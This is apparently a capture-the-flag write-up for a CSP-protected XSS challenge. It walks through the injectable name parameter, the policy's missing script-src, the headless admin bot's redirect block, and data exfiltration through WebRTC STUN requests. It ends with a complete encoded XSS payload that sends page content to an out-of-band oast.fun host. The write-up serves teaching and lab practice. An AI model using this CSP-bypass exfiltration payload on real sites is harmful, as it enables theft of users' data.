by hartmannsyg
Secure Content was secure, but this time its more (less) secure!
This challenge was written as a spinoff of another challenge called Secure Content, which also another Content Security Policy (CSP) challenge. It’s supposed to be less secure (and hence easier) than Secure Content, but the description sounds like it is a sequel which was a mistake on my part.
The attack surface
In the source code given, we see that we can just arbitrarily attack with raw html via name
- this is a straight up xss with no restrictions.
25 | def generatenamepage(name): return """<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Hello!</title> </head> <body> <div> <h1>Hello, """+name+"""!</h1> <p>I hope you like flags! In fact, here is a flag: blahaj{[FLAG REDACTED]}</p> <p>Sadly, only the admin bot can see it :'(</p> </div> </body> </html>""" |
However, we have a CSP in place:
8 | def apply_csp(response: Response) -> Response: csp = ( "connect-src 'none'; " "font-src 'none'; " "frame-src 'none'; " "img-src 'self'; " "manifest-src 'none'; " "media-src 'none'; " "object-src 'none'; " "worker-src 'none'; " "style-src 'self'; " "frame-ancestors 'none'; " "block-all-mixed-content;" "require-trusted-types-for 'script';" ) response.headers['Content-Security-Policy'] = csp return response |
Note that we are missing script-src
, which allows for arbitrary execution of <script></script>
blocks.
We immediately have a few things to try:
Send a request
1 | window.onload = () => { |
Refused to connect to 'https://webhook.site/ac2ef8aa-906a-4ba2-9834-218616911e3c/blahaj%7B[FLAG%20REDACTED]%7D' because it violates the following Content Security Policy directive: "connect-src 'none'". |
Redirects
1 | window.onload = () => { |
CSP does not block redirects (the navigate-to directive is not supported by any browser).
However, the admin bot that runs puppeteer blocks cross-origin redirects
15 | // blocks cross-origin redirects await page.setRequestInterception(true); page.on('request', request => { requestURLObj = new URL(request.url()) if (request.isNavigationRequest() && (requestURLObj.origin != urlObj.origin)) { request.abort(); console.log('uh oh') console.log(requestURLObj) } else { console.log('all good') request.continue(); } }); |
CSP bypasses
With this, there are two possible solutions:
- DNS prefetch
- WebRTC
DNS prefetch does not work on headless, and our admin bot (puppeteer) is being run headless by default. This leaves exfiltration via WebRTC urls:
1 | window.onload = () => { |
To receive this request, we need something to get out-of-band interactions. I am using https://app.interactsh.com/ to receive these WebRTC requests.
The problem with this method is that the urls can only contain lowercase numbers and letters. (There is also a length restriction but I am not evil enough to make the flag so long that you encounter this)
Anyways, I opted to encode the flag as base64, then convert uppercase letters into 2 lowercase letters, and then ship it to the oast url:
1 | window.onload = () => { |
With this we can condense it to a URL paylaod to report to the admin bot (JS minify + encodeURI()
):
http://127.0.0.1:8000/greet?name=%3Cscript%3Ewindow.addEventListener%28%22load%22%2C+%28%29+%3D%3E+%7B+let+data+%3D+btoa%28document.querySelector%28%22p%22%29.innerText.substring%2848%29%29%3B+let+newdata+%3D+data.split%28%22%22%29.map%28%28c%29+%3D%3E+%7B+++++if+%28%21isNaN%28c%29%29+%7Breturn+c%3B%7D+++++else+if+%28c+%3D%3D+c.toUpperCase%28%29%29+%7Breturn+c.toLowerCase%28%29+%2B+c.toLowerCase%28%29%3B%7D+++++else+%7Breturn+c%3B%7D+%7D%29%3B+let+ex+%3D+newdata.join%28%22%22%29.replaceAll%28%22%3D%22%2C%22%22%29%3B+console.log%28ex%29%3B+let+e+%3D+new+RTCPeerConnection%28%7B+iceServers%3A+%5B%7B+urls%3A+%5B%22stun%3A%22%2Bex%2B%22.zrekefudcwgdnisxolob95nwy11uq3ho7.oast.fun%22%5D+%7D%5D+%7D%29%3B+e.createDataChannel%28%22%22%29%3B+e.createOffer%28%29.then%28r+%3D%3E+e.setLocalDescription%28r%29%29+%7D%29%3B%3C%2Fscript%3E |
Extra
How would a DNS prefetch exploit look like?
1 | window.onload = () => { |